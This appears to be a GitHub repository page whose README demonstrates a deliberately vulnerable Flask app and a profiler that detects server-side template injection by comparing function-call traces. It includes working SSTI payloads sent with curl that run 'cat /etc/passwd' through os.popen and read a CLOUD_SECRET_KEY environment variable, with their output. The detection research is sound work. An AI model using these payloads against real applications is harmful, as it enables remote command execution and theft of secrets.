https://github.com/hi120ki/demo-profile-ssti
https://github.com/hi120ki/demo-profile-ssti
Last synced: 7 months ago
JSON representation
- Host: GitHub
- URL: https://github.com/hi120ki/demo-profile-ssti
- Owner: hi120ki
- Created: 2022-03-06T16:06:02.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2022-03-06T17:00:58.000Z (over 3 years ago)
- Last Synced: 2025-01-26T05:25:13.666Z (9 months ago)
- Language: Python
- Size: 13.7 KB
- Stars: 0
- Watchers: 2
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# demo-profile-ssti
Flask application containing SSTI vulnerability.
The profiler measured normal requests, attack requests that read `/etc/passwd`, and attack requests that extract `CLOUD_SECRET_KEY` from environment variables.
Then, from the comparison of the measurement results, it was confirmed that the profiler can find traces of the attack.
## normal request
### request
```
$ curl -X POST http://192.168.0.205:80/ssti -d name="test"
test
```
### profile data
## read `/etc/passwd`
### request
```
$ curl -X POST http://192.168.0.205:80/ssti -d name="{{request.application.__globals__.__builtins__.__import__('os').popen('cat /etc/passwd').read()}}"
root:x:0:0:root:/root:/bin/ash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
...
```
### profile data
The following differences were confirmed compared to normal requests.
```diff
+ { "func": "popen", "file": "/usr/local/lib/python3.10/os.py" },
+ { "func": "__init__", "file": "/usr/local/lib/python3.10/subprocess.py" },
+ { "func": "_cleanup", "file": "/usr/local/lib/python3.10/subprocess.py" },
+ { "func": "_get_handles", "file": "/usr/local/lib/python3.10/subprocess.py" },
+ { "func": "__init__", "file": "/usr/local/lib/python3.10/codecs.py" },
+ { "func": "__init__", "file": "/usr/local/lib/python3.10/codecs.py" },
```
## extract `CLOUD_SECRET_KEY`
### request
```
$ curl -X POST http://192.168.0.205:80/ssti -d name="{{request.application.__globals__.__builtins__.__import__('os').getenv('CLOUD_SECRET_KEY')}}"
8Z0MH8EWYMB0N439
```
### profile data
The following differences were confirmed compared to normal requests.
```diff
+ { "func": "getenv", "file": "/usr/local/lib/python3.10/os.py" },
+ { "func": "get", "file": "/usr/local/lib/python3.10/_collections_abc.py" },
+ { "func": "__getitem__", "file": "/usr/local/lib/python3.10/os.py" },
+ { "func": "encode", "file": "/usr/local/lib/python3.10/os.py" },
+ { "func": "decode", "file": "/usr/local/lib/python3.10/os.py" },
```